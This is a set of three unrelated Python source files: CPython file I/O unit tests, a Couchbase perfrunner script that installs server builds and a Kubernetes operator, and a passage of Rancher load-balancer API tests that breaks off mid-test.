def testAttributes(self):
# verify expected attributes exist
f = self.f
f.name # merely shouldn't blow up
f.mode # ditto
f.closed # ditto
def testReadinto(self):
# verify readinto
self.f.write(b'12')
self.f.close()
a = array('b', b'x'*10)
self.f = self.open(TESTFN, 'rb')
n = self.f.readinto(a)
self.assertEqual(b'12', a.tobytes()[:n])
def testReadinto_text(self):
# verify readinto refuses text files
a = array('b', b'x'*10)
self.f.close()
self.f = self.open(TESTFN, 'r')
if hasattr(self.f, "readinto"):
self.assertRaises(TypeError, self.f.readinto, a)
def testWritelinesUserList(self):
# verify writelines with instance sequence
l = UserList([b'1', b'2'])
self.f.writelines(l)
self.f.close()
self.f = self.open(TESTFN, 'rb')
buf = self.f.read()
self.assertEqual(buf, b'12')
def testWritelinesIntegers(self):
# verify writelines with integers
self.assertRaises(TypeError, self.f.writelines, [1, 2, 3])
def testWritelinesIntegersUserList(self):
# verify writelines with integers in UserList
l = UserList([1,2,3])
self.assertRaises(TypeError, self.f.writelines, l)
def testWritelinesNonString(self):
# verify writelines with non-string object
class NonString:
pass
self.assertRaises(TypeError, self.f.writelines,
[NonString(), NonString()])
def testErrors(self):
f = self.f
self.assertEqual(f.name, TESTFN)
self.assertTrue(not f.isatty())
self.assertTrue(not f.closed)
if hasattr(f, "readinto"):
self.assertRaises((IOError, TypeError), f.readinto, "")
f.close()
self.assertTrue(f.closed)
def testMethods(self):
methods = [('fileno', ()),
('flush', ()),
('isatty', ()),
('__next__', ()),
('read', ()),
('write', (b"",)),
('readline', ()),
('readlines', ()),
('seek', (0,)),
('tell', ()),
('write', (b"",)),
('writelines', ([],)),
('__iter__', ()),
]
methods.append(('truncate', ()))
# __exit__ should close the file
self.f.__exit__(None, None, None)
self.assertTrue(self.f.closed)
for methodname, args in methods:
method = getattr(self.f, methodname)
# should raise on closed file
self.assertRaises(ValueError, method, *args)
# file is closed, __exit__ shouldn't do anything
self.assertEqual(self.f.__exit__(None, None, None), None)
# it must also return None if an exception was given
try:
1/0
except:
self.assertEqual(self.f.__exit__(*sys.exc_info()), None)
def testReadWhenWriting(self):
self.assertRaises(IOError, self.f.read)
class CAutoFileTests(AutoFileTests):
open = io.open
class PyAutoFileTests(AutoFileTests):
open = staticmethod(pyio.open)
class OtherFileTests(unittest.TestCase):
def testModeStrings(self):
# check invalid mode strings
for mode in ("", "aU", "wU+"):
try:
f = self.open(TESTFN, mode)
except ValueError:
pass
else:
f.close()
self.fail('%r is an invalid file mode' % mode)
def testStdin(self):
# This causes the interpreter to exit on OSF1 v5.1.
if sys.platform != 'osf1V5':
self.assertRaises((IOError, ValueError), sys.stdin.seek, -1)
else:
print((
' Skipping sys.stdin.seek(-1), it may crash the interpreter.'
' Test manually.'), file=sys.__stdout__)
self.assertRaises((IOError, ValueError), sys.stdin.truncate)
def testBadModeArgument(self):
# verify that we get a sensible error message for bad mode argument
bad_mode = "qwerty"
try:
f = self.open(TESTFN, bad_mode)
except ValueError as msg:
if msg.args[0] != 0:
s = str(msg)
if TESTFN in s or bad_mode not in s:
self.fail("bad error message for invalid mode: %s" % s)
# if msg.args[0] == 0, we're probably on Windows where there may be
# no obvious way to discover why open() failed.
else:
f.close()
self.fail("no error for invalid mode: %s" % bad_mode)
def testSetBufferSize(self):
# make sure that explicitly setting the buffer size doesn't cause
# misbehaviour especially with repeated close() calls
for s in (-1, 0, 1, 512):
try:
f = self.open(TESTFN, 'wb', s)
f.write(str(s).encode("ascii"))
f.close()
f.close()
f = self.open(TESTFN, 'rb', s)
d = int(f.read().decode("ascii"))
f.close()
f.close()
except IOError as msg:
self.fail('error setting buffer size %d: %s' % (s, str(msg)))
self.assertEqual(d, s)
def testTruncateOnWindows(self):
# SF bug <http://www.python.org/sf/801631>
# "file.truncate fault on windows"
os.unlink(TESTFN)
f = self.open(TESTFN, 'wb')
try:
f.write(b'12345678901') # 11 bytes
f.close()
f = self.open(TESTFN,'rb+')
data = f.read(5)
if data != b'12345':
self.fail("Read on file opened for update failed %r" % data)
if f.tell() != 5:
self.fail("File pos after read wrong %d" % f.tell())
f.truncate()
if f.tell() != 5:
self.fail("File pos after ftruncate wrong %d" % f.tell())
f.close()
size = os.path.getsize(TESTFN)
if size != 5:
self.fail("File size after ftruncate wrong %d" % size)
finally:
f.close()
os.unlink(TESTFN)
def testIteration(self):
# Test the complex interaction when mixing file-iteration and the
# various read* methods.
dataoffset = 16384
filler = b"ham\n"
assert not dataoffset % len(filler), \
"dataoffset must be multiple of len(filler)"
nchunks = dataoffset // len(filler)
testlines = [
b"spam, spam and eggs\n",
b"eggs, spam, ham and spam\n",
b"saussages, spam, spam and eggs\n",
b"spam, ham, spam and eggs\n",
b"spam, spam, spam, spam, spam, ham, spam\n",
b"wonderful spaaaaaam.\n"
]
methods = [("readline", ()), ("read", ()), ("readlines", ()),
("readinto", (array("b", b" "*100),))]
try:
# Prepare the testfile
bag = self.open(TESTFN, "wb")
bag.write(filler * nchunks)
bag.writelines(testlines)
bag.close()
# Test for appropriate errors mixing read* and iteration
for methodname, args in methods:
f = self.open(TESTFN, 'rb')
if next(f) != filler:
self.fail, "Broken testfile"
meth = getattr(f, methodname)
meth(*args) # This simply shouldn't fail
f.close()
# Test to see if harmless (by accident) mixing of read* and
# iteration still works. This depends on the size of the internal
# iteration buffer (currently 8192,) but we can test it in a
# flexible manner. Each line in the bag o' ham is 4 bytes
# ("h", "a", "m", "\n"), so 4096 lines of that should get us
# exactly on the buffer boundary for any power-of-2 buffersize
# between 4 and 16384 (inclusive).
f = self.open(TESTFN, 'rb')
for i in range(nchunks):
next(f)
testline = testlines.pop(0)
try:
line = f.readline()
except ValueError:
self.fail("readline() after next() with supposedly empty "
"iteration-buffer failed anyway")
if line != testline:
self.fail("readline() after next() with empty buffer "
"failed. Got %r, expected %r" % (line, testline))
testline = testlines.pop(0)
buf = array("b", b"\x00" * len(testline))
try:
f.readinto(buf)
except ValueError:
self.fail("readinto() after next() with supposedly empty "
"iteration-buffer failed anyway")
line = buf.tobytes()
if line != testline:
self.fail("readinto() after next() with empty buffer "
"failed. Got %r, expected %r" % (line, testline))
testline = testlines.pop(0)
try:
line = f.read(len(testline))
except ValueError:
self.fail("read() after next() with supposedly empty "
"iteration-buffer failed anyway")
if line != testline:
self.fail("read() after next() with empty buffer "
"failed. Got %r, expected %r" % (line, testline))
try:
lines = f.readlines()
except ValueError:
self.fail("readlines() after next() with supposedly empty "
"iteration-buffer failed anyway")
if lines != testlines:
self.fail("readlines() after next() with empty buffer "
"failed. Got %r, expected %r" % (line, testline))
f.close()
# Reading after iteration hit EOF shouldn't hurt either
f = self.open(TESTFN, 'rb')
try:
for line in f:
pass
try:
f.readline()
f.readinto(buf)
f.read()
f.readlines()
except ValueError:
self.fail("read* failed after next() consumed file")
finally:
f.close()
finally:
os.unlink(TESTFN)
class COtherFileTests(OtherFileTests):
open = io.open
class PyOtherFileTests(OtherFileTests):
open = staticmethod(pyio.open)
def test_main():
# Historically, these tests have been sloppy about removing TESTFN.
# So get rid of it no matter what.
try:
run_unittest(CAutoFileTests, PyAutoFileTests,
COtherFileTests, PyOtherFileTests)
finally:
if os.path.exists(TESTFN):
os.unlink(TESTFN)
if __name__ == '__main__':
test_main()
| |
import os
import sys
from argparse import ArgumentParser
from collections import namedtuple
from multiprocessing import Process, set_start_method
from typing import Iterator
import paramiko
import requests
import validators
from fabric.api import cd, run
from requests.exceptions import ConnectionError
from logger import logger
from perfrunner.helpers.local import detect_ubuntu_release
from perfrunner.helpers.remote import RemoteHelper
from perfrunner.remote.context import master_client
from perfrunner.settings import ClusterSpec
set_start_method("fork")
LOCATIONS = (
'http://172.23.126.166/builds/latestbuilds/couchbase-server/morpheus/{build}/',
'http://172.23.126.166/builds/latestbuilds/couchbase-server/neo/{build}/',
'http://172.23.126.166/builds/latestbuilds/couchbase-server/magma-preview/{build}/',
'http://172.23.126.166/builds/latestbuilds/couchbase-server/cheshire-cat/{build}/',
'http://172.23.126.166/builds/latestbuilds/couchbase-server/mad-hatter/{build}/',
'http://172.23.126.166/builds/latestbuilds/couchbase-server/alice/{build}/',
'http://172.23.126.166/builds/latestbuilds/couchbase-server/vulcan/{build}/',
'http://172.23.126.166/builds/latestbuilds/couchbase-server/spock/{build}/',
'http://172.23.126.166/builds/latestbuilds/couchbase-server/watson/{build}/',
'http://172.23.126.166/builds/latestbuilds/couchbase-server/master/{build}/',
'http://172.23.126.166/builds/releases/{release}/',
'http://172.23.126.166/builds/releases/{release}/ce/',
)
PKG_PATTERNS = {
'rpm': (
'couchbase-server-{edition}-{release}-{build}-centos{os}.x86_64.rpm',
'couchbase-server-{edition}-{release}-centos{os}.x86_64.rpm',
'couchbase-server-{edition}-{release}-centos6.x86_64.rpm',
'couchbase-server-{edition}-{release}-{build}-{os}.rpm',
'couchbase-server-{edition}-{release}-{os}.rpm',
),
'deb': (
'couchbase-server-{edition}_{release}-{build}-ubuntu{os}_amd64.deb',
'couchbase-server-{edition}_{release}-ubuntu{os}_amd64.deb',
),
'exe': (
'couchbase-server-{edition}_{release}-{build}-windows_amd64.msi',
'couchbase-server-{edition}_{release}-{build}-windows_amd64.exe',
'couchbase-server-{edition}_{release}-windows_amd64.exe',
),
}
Build = namedtuple('Build', ['filename', 'url'])
class OperatorInstaller:
def __init__(self, cluster_spec, options):
self.options = options
self.cluster_spec = cluster_spec
self.operator_version = self.options.operator_version
if "-" in self.operator_version:
self.operator_release = self.operator_version.split("-")[0]
self.operator_tag = 'registry.gitlab.com/cb-vanilla/operator:{}'\
.format(self.operator_version)
self.admission_controller_release = self.operator_version.split("-")[0]
self.admission_controller_tag = \
'registry.gitlab.com/cb-vanilla/admission-controller:{}' \
.format(self.operator_version)
else:
self.operator_release = self.operator_version
self.operator_tag = 'couchbase/operator:{}'\
.format(self.operator_version)
self.admission_controller_release = self.operator_version
self.admission_controller_tag = 'couchbase/admission-controller:{}' \
.format(self.operator_version)
self.couchbase_version = self.options.couchbase_version
if "-" in self.couchbase_version:
self.couchbase_release = self.couchbase_version.split("-")[0]
self.couchbase_tag = 'registry.gitlab.com/cb-vanilla/server:{}'\
.format(self.couchbase_version)
else:
self.couchbase_release = self.couchbase_version
self.couchbase_tag = 'couchbase/server:{}'\
.format(self.couchbase_version)
self.operator_backup_version = self.options.operator_backup_version
if self.operator_backup_version:
if "-" in self.operator_backup_version:
self.operator_backup_release = self.operator_backup_version.split("-")[0]
self.operator_backup_tag = 'registry.gitlab.com/cb-vanilla/operator-backup:{}'\
.format(self.operator_backup_version)
else:
self.operator_backup_release = self.operator_backup_version
self.operator_backup_tag = 'couchbase/operator-backup/{}'\
.format(self.operator_backup_version)
else:
self.operator_backup_tag = 'registry.gitlab.com/cb-vanilla/operator-backup:latest'
self.node_count = len(self.cluster_spec.infrastructure_clusters['couchbase1'].split())
self.remote = RemoteHelper(cluster_spec)
self.docker_config_path = os.path.expanduser("~") + "/.docker/config.json"
self.operator_base_path = "cloud/operator/{}/{}"\
.format(self.operator_release.split(".")[0],
self.operator_release.split(".")[1])
self.certificate_authority_path = "{}/ca.crt"\
.format(self.operator_base_path)
self.crd_path = "{}/crd.yaml"\
.format(self.operator_base_path)
self.config_path = "{}/config.yaml"\
.format(self.operator_base_path)
self.config_template_path = "{}/config_template.yaml"\
.format(self.operator_base_path)
self.auth_path = "{}/auth_secret.yaml"\
.format(self.operator_base_path)
self.cb_cluster_path = "{}/couchbase-cluster.yaml"\
.format(self.operator_base_path)
self.template_cb_cluster_path = "{}/couchbase-cluster_template.yaml"\
.format(self.operator_base_path)
self.worker_base_path = "cloud/worker"
self.worker_path = "{}/worker.yaml"\
.format(self.worker_base_path)
self.rmq_base_path = "cloud/broker/rabbitmq/0.48"
self.rmq_operator_path = "{}/cluster-operator.yaml"\
.format(self.rmq_base_path)
self.rmq_cluster_path = "{}/rabbitmq.yaml"\
.format(self.rmq_base_path)
def install(self):
self.install_operator()
self.install_celery_broker()
def install_operator(self):
logger.info("installing operator")
self.create_secrets()
self.create_crd()
self.create_config()
self.wait_for_operator_and_admission()
self.create_auth()
self.create_cluster()
self.wait_for_cluster()
def install_celery_broker(self):
logger.info("installing celery broker")
self.create_rabbitmq_operator()
self.wait_for_rabbitmq_operator()
self.create_rabbitmq_cluster()
self.wait_for_rabbitmq_cluster()
self.creating_rabbitmq_config()
def uninstall(self):
self.uninstall_operator()
self.uninstall_celery_broker()
self.uninstall_workers()
self.delete_artifacts()
def uninstall_operator(self):
logger.info("uninstalling operator")
self.delete_operator_files()
self.delete_operator_secrets()
self.wait_for_operator_deletion()
def uninstall_celery_broker(self):
logger.info("uninstalling celery broker")
self.delete_rabbitmq_files()
self.wait_for_rabbitmq_deletion()
def uninstall_workers(self):
logger.info("uninstall workers")
self.delete_worker_files()
self.wait_for_worker_deletion()
def create_secrets(self):
logger.info("creating secrets")
self.remote.create_docker_secret(
self.docker_config_path)
self.remote.create_operator_tls_secret(
self.certificate_authority_path)
def create_crd(self):
logger.info("creating CRD")
self.remote.create_from_file(self.crd_path)
def create_config(self):
logger.info("creating config")
self.remote.create_operator_config(
self.config_template_path,
self.config_path,
self.operator_tag,
self.admission_controller_tag)
def create_auth(self):
logger.info("creating auth")
self.remote.create_from_file(self.auth_path)
def create_cluster(self):
logger.info("creating couchbase cluster")
self.remote.create_couchbase_cluster(
self.template_cb_cluster_path,
self.cb_cluster_path,
self.couchbase_tag,
self.operator_backup_tag,
self.node_count)
def wait_for_operator_and_admission(self):
logger.info("waiting for operator and admission controller")
self.remote.wait_for_admission_controller_ready()
self.remote.wait_for_operator_ready()
def wait_for_cluster(self):
logger.info("waiting for cluster")
self.remote.wait_for_couchbase_pods_ready(self.node_count)
def create_rabbitmq_operator(self):
logger.info("creating rabbitmq operator")
self.remote.create_from_file(self.rmq_operator_path)
def wait_for_rabbitmq_operator(self):
logger.info("waiting for rabbitmq operator")
self.remote.wait_for_rabbitmq_operator_ready()
def create_rabbitmq_cluster(self):
logger.info("creating rabbitmq cluster")
self.remote.create_from_file(self.rmq_cluster_path)
def wait_for_rabbitmq_cluster(self):
logger.info("waiting for rabbitmq cluster")
self.remote.wait_for_rabbitmq_broker_ready()
def creating_rabbitmq_config(self):
logger.info("creating rabbitmq config")
self.remote.upload_rabbitmq_config()
def delete_operator_files(self):
logger.info("deleting operator files")
files = [self.cb_cluster_path, self.auth_path,
self.config_path, self.crd_path]
self.remote.delete_from_files(files)
def delete_operator_secrets(self):
logger.info("deleting operator secrets")
secrets = ['regcred', 'couchbase-operator-tls',
'couchbase-server-tls', 'user-password-secret']
self.remote.delete_secrets(secrets)
def wait_for_operator_deletion(self):
logger.info("waiting for operator deletion")
self.remote.wait_for_operator_deletion()
def delete_rabbitmq_files(self):
logger.info("deleting rabbit mq files")
self.remote.delete_from_files(
[self.rmq_cluster_path,
self.rmq_operator_path])
def wait_for_rabbitmq_deletion(self):
logger.info("waiting for rabbitmq deletion")
self.remote.wait_for_rabbitmq_deletion()
def delete_worker_files(self):
logger.info("deleting worker files")
self.remote.delete_from_file(self.worker_path)
def wait_for_worker_deletion(self):
logger.info("waiting for worker deletion")
self.remote.wait_for_workers_deletion()
def delete_artifacts(self):
logger.info("deleting any artifact pods, pvcs, and backups")
self.remote.delete_all_backups()
self.remote.delete_all_pods()
self.remote.delete_all_pvc()
class KubernetesInstaller:
def __init__(self, cluster_spec, options):
self.options = options
self.cluster_spec = cluster_spec
self.operator_installer = OperatorInstaller(cluster_spec, options)
def install(self):
self.install_storage_class()
self.install_istio()
self.operator_installer.install()
def uninstall(self):
self.operator_installer.uninstall()
self.uninstall_istio()
self.uninstall_storage_class()
def install_storage_class(self):
raise NotImplementedError
def uninstall_storage_class(self):
raise NotImplementedError
def install_istio(self):
raise NotImplementedError
def uninstall_istio(self):
raise NotImplementedError
class EKSInstaller(KubernetesInstaller):
STORAGE_CLASSES = {
'default': None,
'gp2': 'cloud/infrastructure/aws/eks/ebs-gp2-sc.yaml'
}
def __init__(self, cluster_spec, options):
super().__init__(cluster_spec, options)
def install_storage_class(self):
scs = self.operator_installer.remote.get_storage_classes()
for sc in scs['items']:
sc_name = sc['metadata']['name']
self.operator_installer.remote.delete_storage_class(sc_name)
for cluster in self.cluster_spec.kubernetes_clusters():
sc = self.cluster_spec.kubernetes_storage_class(cluster)
if self.STORAGE_CLASSES[sc]:
self.operator_installer.remote.create_from_file(self.STORAGE_CLASSES[sc])
def uninstall_storage_class(self):
for cluster in self.cluster_spec.kubernetes_clusters():
sc = self.cluster_spec.kubernetes_storage_class(cluster)
if self.STORAGE_CLASSES[sc]:
self.operator_installer.remote.delete_from_file(self.STORAGE_CLASSES[sc])
def install_istio(self):
if not self.cluster_spec.istio_enabled('k8s_cluster_1'):
return
istio_install_cmd = "install " \
"--set profile=default " \
"--set values.global.defaultNodeSelector.'NodeRoles'=utilities -y"
istio_label_cmd = "label namespace default istio-injection=enabled --overwrite"
self.operator_installer.remote.istioctl(istio_install_cmd)
self.operator_installer.remote.kubectl(istio_label_cmd)
def uninstall_istio(self):
if not self.cluster_spec.istio_enabled('k8s_cluster_1'):
return
self.operator_installer.remote.istioctl("x uninstall --purge -y")
self.operator_installer.remote.delete_namespace("istio-system")
self.operator_installer.remote.kubectl("label namespace default istio-injection-")
def install_kubernetes_dashboard(self):
pass
def uninstall_kubernetes_dashboard(self):
pass
class AKSInstaller(KubernetesInstaller):
def __init__(self, cluster_spec, options):
super().__init__(cluster_spec, options)
class GKEInstaller(KubernetesInstaller):
def __init__(self, cluster_spec, options):
super().__init__(cluster_spec, options)
class CouchbaseInstaller:
def __init__(self, cluster_spec, options):
self.remote = RemoteHelper(cluster_spec, options.verbose)
self.options = options
self.cluster_spec = cluster_spec
@property
def url(self) -> str:
if validators.url(self.options.couchbase_version):
return self.options.couchbase_version
else:
return self.find_package(edition=self.options.edition)
@property
def release(self) -> str:
return self.options.couchbase_version.split('-')[0]
@property
def build(self) -> str:
split = self.options.couchbase_version.split('-')
if len(split) > 1:
return split[1]
def find_package(self, edition: str,
package: str = None, os_release: str = None) -> [str, str]:
for url in self.url_iterator(edition, package, os_release):
if self.is_exist(url):
return url
logger.interrupt('Target build not found')
def url_iterator(self, edition: str,
package: str = None, os_release: str = None) -> Iterator[str]:
if package is None:
if self.remote.package == 'rpm':
if self.cluster_spec.cloud_infrastructure:
os_arch = self.cluster_spec.infrastructure_settings.get('os_arch', 'x86_64')
if os_arch == 'arm':
os_release = 'amzn2.aarch64'
elif os_arch == 'al2':
os_release == 'amzn2.x86_64'
else:
os_release = self.remote.detect_centos_release()
else:
os_release = self.remote.detect_centos_release()
elif self.remote.package == 'deb':
os_release = self.remote.detect_ubuntu_release()
package = self.remote.package
for pkg_pattern in PKG_PATTERNS[package]:
for loc_pattern in LOCATIONS:
url = loc_pattern + pkg_pattern
yield url.format(release=self.release, build=self.build,
edition=edition, os=os_release)
@staticmethod
def is_exist(url):
try:
status_code = requests.head(url).status_code
except ConnectionError:
return False
if status_code == 200:
return True
return False
def download(self):
"""Download and save a copy of the specified package."""
if self.remote.package == 'rpm':
logger.info('Saving a local copy of {}'.format(self.url))
with open('couchbase.rpm', 'wb') as fh:
resp = requests.get(self.url)
fh.write(resp.content)
else:
logger.interrupt('Unsupported package format')
def download_local(self, local_copy_url: str = None):
"""Download and save a copy of the specified package."""
try:
if RemoteHelper.detect_server_os("127.0.0.1", self.cluster_spec).\
upper() in ('UBUNTU', 'DEBIAN'):
os_release = detect_ubuntu_release()
if local_copy_url:
url = local_copy_url
else:
url = self.find_package(edition=self.options.edition,
package="deb", os_release=os_release)
logger.info('Saving a local copy of {}'.format(url))
with open('couchbase.deb', 'wb') as fh:
resp = requests.get(url)
fh.write(resp.content)
except (Exception, BaseException):
logger.info("Saving local copy for ubuntu failed, package may not present")
def download_remote(self):
"""Download and save a copy of the specified package on a remote client."""
if self.remote.package == 'rpm':
logger.info('Saving a remote copy of {}'.format(self.url))
self.wget(url=self.url)
else:
logger.interrupt('Unsupported package format')
@master_client
def wget(self, url):
logger.info('Fetching {}'.format(url))
with cd('/tmp'):
run('wget -nc "{}"'.format(url))
package = url.split('/')[-1]
run('mv {} couchbase.rpm'.format(package))
def kill_processes(self):
self.remote.kill_processes()
def uninstall_package(self):
self.remote.uninstall_couchbase()
def clean_data(self):
self.remote.clean_data()
def install_package(self):
logger.info('Using this URL: {}'.format(self.url))
self.remote.upload_iss_files(self.release)
self.remote.install_couchbase(self.url)
def install(self):
self.kill_processes()
self.uninstall_package()
self.clean_data()
self.install_package()
class CloudInstaller(CouchbaseInstaller):
def __init__(self, cluster_spec, options):
super().__init__(cluster_spec, options)
def install_package(self):
logger.info('Using this URL: {}'.format(self.url))
self.remote.upload_iss_files(self.release)
package_name = "couchbase.{}".format(self.remote.package)
logger.info('Saving a local copy of {}'.format(self.url))
with open(package_name, 'wb') as fh:
resp = requests.get(self.url)
fh.write(resp.content)
logger.info('Uploading {} to servers'.format(package_name))
uploads = []
user, password = self.cluster_spec.ssh_credentials
hosts = self.cluster_spec.servers
if self.options.remote_copy:
hosts += self.cluster_spec.workers
for host in hosts:
logger.info('Uploading {} to {}'.format(package_name, host))
args = (host, user, password, package_name)
def upload_couchbase(to_host, to_user, to_password, package):
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.WarningPolicy())
client.connect(to_host, username=to_user, password=to_password)
sftp = client.open_sftp()
sftp.put(package, "/tmp/{}".format(package))
sftp.close()
worker_process = Process(target=upload_couchbase, args=args)
worker_process.daemon = True
worker_process.start()
uploads.append(worker_process)
for process in uploads:
process.join()
self.remote.install_uploaded_couchbase(package_name)
def get_args():
parser = ArgumentParser()
parser.add_argument('-v', '--version', '--url', '-cv', '--couchbase-version',
required=True,
dest='couchbase_version',
help='the build version or the HTTP URL to a package')
parser.add_argument('-c', '--cluster',
required=True,
help='the path to a cluster specification file')
parser.add_argument('-e', '--edition',
choices=['enterprise', 'community'],
default='enterprise',
help='the cluster edition')
parser.add_argument('--verbose',
action='store_true',
help='enable verbose logging')
parser.add_argument('--local-copy',
action='store_true',
help='save a local copy of a package')
parser.add_argument('--remote-copy',
action='store_true',
help='save a remote copy of a package')
parser.add_argument('--local-copy-url',
default=None,
help='The local copy url of the build')
parser.add_argument('-ov', '--operator-version',
dest='operator_version',
help='the build version for the couchbase operator')
parser.add_argument('-obv', '--operator-backup-version',
dest='operator_backup_version',
help='the build version for the couchbase operator')
parser.add_argument('-u', '--uninstall',
action='store_true',
help='the path to a cluster specification file')
return parser.parse_args()
def main():
args = get_args()
cluster_spec = ClusterSpec()
cluster_spec.parse(fname=args.cluster)
if cluster_spec.cloud_infrastructure:
if cluster_spec.kubernetes_infrastructure:
infra_provider = cluster_spec.infrastructure_settings['provider']
if infra_provider == 'aws':
installer = EKSInstaller(cluster_spec, args)
elif infra_provider == 'azure':
installer = AKSInstaller(cluster_spec, args)
elif infra_provider == 'gcp':
installer = GKEInstaller(cluster_spec, args)
else:
raise Exception("{} is not a valid infrastructure provider"
.format(infra_provider))
else:
installer = CloudInstaller(cluster_spec, args)
if args.uninstall:
installer.uninstall()
else:
installer.install()
else:
installer = CouchbaseInstaller(cluster_spec, args)
installer.install()
if args.local_copy:
installer.download()
installer.download_local(args.local_copy_url)
if '--remote-copy' in sys.argv:
logger.info('Saving a remote copy')
installer.download_remote()
if __name__ == '__main__':
main()
| |
from common_fixtures import * # NOQA
from cattle import ApiError
@pytest.fixture(scope='module')
def config_id(client):
default_lb_config = client. \
create_loadBalancerConfig(name=random_str())
default_lb_config = client.wait_success(default_lb_config)
return default_lb_config.id
# test (C)
def test_lb_create_wo_config(client):
with pytest.raises(ApiError) as e:
client.create_loadBalancer(name=random_str())
assert e.value.error.status == 422
assert e.value.error.code == 'MissingRequired'
assert e.value.error.fieldName == 'loadBalancerConfigId'
# test (C)
def test_lb_create_w_config(client, config_id):
lb = _create_valid_lb(client, config_id)
assert lb.state == 'active'
assert lb.loadBalancerConfigId == config_id
# test (D)
def test_lb_remove(client, config_id):
# create lb
lb = _create_valid_lb(client, config_id)
# remove newly created lb
lb = client.wait_success(client.delete(lb))
assert lb.state == 'removed'
# test (U)
def test_lb_update(client, config_id):
# create lb
lb = _create_valid_lb(client, config_id)
# update the lb
lb = client.update(lb, name='newName')
assert lb.name == 'newName'
def test_lb_add_target_instance(client, context, config_id):
container, lb = _create_lb_and_container(client, context, config_id)
# add target to a load balancer
lb = _add_target(lb, container=container)
_validate_add_target(container, lb, client)
def test_lb_add_target_instance_with_ports(client, context, config_id):
container, lb = _create_lb_and_container(client, context, config_id)
# add target to a load balancer
lb = _add_target(lb, container=container,
ports=["77:a.com", "99:b.com, c.com"])
_validate_add_target(container, lb,
client, ports=["77:a.com", "99:b.com, c.com"])
def test_lb_remove_target_instance(client, context, config_id):
container, lb = _create_lb_and_container(client, context, config_id)
lb = _add_target(lb, container=container)
_validate_add_target(container, lb, client)
# remove the target and verify that the target no longer exists
lb = _remove_target(lb, container)
_validate_remove_target(container, lb, client)
def test_lb_add_target_ip_address(client, context, config_id):
lb = _create_valid_lb(client, config_id)
ip_address = "10.1.1.1"
lb = _add_target(lb, ip_address=ip_address)
lb = client.wait_success(lb)
_validate_add_target_ip(ip_address, lb, client)
def test_lb_remove_target_ip_address(client, context, config_id):
lb = _create_valid_lb(client, config_id)
# add target to a load balancer and verify that it got created
ip_address = "10.1.1.1"
lb = _add_target(lb, ip_address=ip_address)
_validate_add_target_ip(ip_address, lb, client)
# remove the target and verify that the target no longer exists
lb = _remove_target(lb, ip_address=ip_address)
_validate_remove_target_ip(ip_address, lb, client)
def test_lb_remove_w_target(client, context, config_id):
container, lb = _create_lb_and_container(client, context, config_id)
# add target to a load balancer
lb = _add_target(lb, container=container)
lb = client.wait_success(lb)
# remove the load balancer
lb = client.wait_success(client.delete(lb))
assert lb.state == 'removed'
_validate_remove_target(container, lb, client)
def test_lb_remove_w_host(client, context, config_id):
host = context.host
# create lb, assign the hosts to it
lb = _create_valid_lb(client, config_id)
lb = lb.addhost(hostId=host.id)
_validate_add_host(host, lb, client)
# remove the load balancer
lb = client.wait_success(client.delete(lb))
assert lb.state == 'removed'
_validate_remove_host(host, lb, client)
def test_set_target_instance(client, context, config_id):
container1, lb = _create_lb_and_container(client, context, config_id)
container2 = client. \
create_container(imageUuid=context.image_uuid,
startOnCreate=False)
container2 = client.wait_success(container2)
# set 2 targets
lb = _set_targets(lb, containers=[container1, container2])
lb = client.wait_success(lb)
_validate_add_target(container1, lb, client)
_validate_add_target(container2, lb, client)
# set 1 target
lb = _set_targets(lb, containers=[container1])
_validate_add_target(container1, lb, client)
_validate_remove_target(container2, lb, client)
# set 0 targets
lb = _set_targets(lb, containers=[])
_validate_remove_target(container1, lb, client)
def test_lb_set_target_ip_address(client, context, config_id):
lb = _create_valid_lb(client, config_id)
# set 2 targets
lb = _set_targets(lb, ip_addresses=["10.1.1.1", "10.1.1.2"])
_validate_add_target_ip("10.1.1.1", lb, client)
_validate_add_target_ip("10.1.1.2", lb, client)
# set 1 target
lb = _set_targets(lb, ip_addresses=["10.1.1.1"])
_validate_add_target_ip("10.1.1.1", lb, client)
_validate_remove_target_ip("10.1.1.2", lb, client)
# set 0 targets
lb = _set_targets(lb, ip_addresses=[])
_validate_remove_target_ip("10.1.1.1", lb, client)
def test_set_target_instance_and_ip(client, context, config_id):
container1, lb = _create_lb_and_container(client, context, config_id)
# set 2 targets - one ip and one instanceId
lb = _set_targets(lb, containers=[container1], ip_addresses=["10.1.1.1"])
_validate_add_target(container1, lb, client)
_validate_add_target_ip("10.1.1.1", lb, client)
def test_lb_add_target_instance_twice(client, context, config_id):
container, lb = _create_lb_and_container(client, context, config_id)
# add target to a load balancer
lb = _add_target(lb, container)
_validate_add_target(container, lb, client)
with pytest.raises(ApiError) as e:
_add_target(lb, container)
assert e.value.error.status == 422
assert e.value.error.code == 'NotUnique'
assert e.value.error.fieldName == 'instanceId'
def test_lb_remove_non_existing_target_instance(client, context, config_id):
container, lb = _create_lb_and_container(client, context, config_id)
# remove non-existing target
with pytest.raises(ApiError) as e:
_remove_target(lb, container)
assert e.value.error.status == 422
assert e.value.error.code == 'InvalidOption'
assert e.value.error.fieldName == 'instanceId'
def test_lb_add_target_ip_address_and_instance(client, context, config_id):
container, lb = _create_lb_and_container(client, context, config_id)
with pytest.raises(ApiError) as e:
_add_target(lb, container=container, ip_address="10.1.1.1")
assert e.value.error.status == 422
assert e.value.error.code == 'InvalidOption'
assert e.value.error.fieldName == 'ipAddress'
def test_lb_add_target_w_no_option(client, context, config_id):
container, lb = _create_lb_and_container(client, context, config_id)
with pytest.raises(ApiError) as e:
_add_target(lb)
assert e.value.error.status == 422
assert e.value.error.code == 'MissingRequired'
assert e.value.error.fieldName == 'instanceId'
def test_lb_add_target_ip_twice(client, context, config_id):
container, lb = _create_lb_and_container(client, context, config_id)
# add target to a load balancer
lb = _add_target(lb, ip_address="10.1.1.1")
_validate_add_target_ip("10.1.1.1", lb, client)
with pytest.raises(ApiError) as e:
_add_target(lb, ip_address="10.1.1.1")
assert e.value.error.status == 422
assert e.value.error.code == 'NotUnique'
assert e.value.error.fieldName == 'ipAddress'
def test_lb_remove_non_existing_target_ip(client, context, config_id):
container, lb = _create_lb_and_container(client, context, config_id)
# remove non-existing target
with pytest.raises(ApiError) as e:
_remove_target(lb, ip_address="10.1.1.1")
assert e.value.error.status == 422
assert e.value.error.code == 'InvalidOption'
assert e.value.error.fieldName == 'ipAddress'
def test_add_removed_target_again(client, context, config_id):
container, lb = _create_lb_and_container(client, context, config_id)
# add target to a load balancer
lb = _add_target(lb, container=container)
_validate_add_target(container, lb, client)
# remove the target
lb = _remove_target(lb, container)
_validate_remove_target(container, lb, client)
# add the target - should be allowed
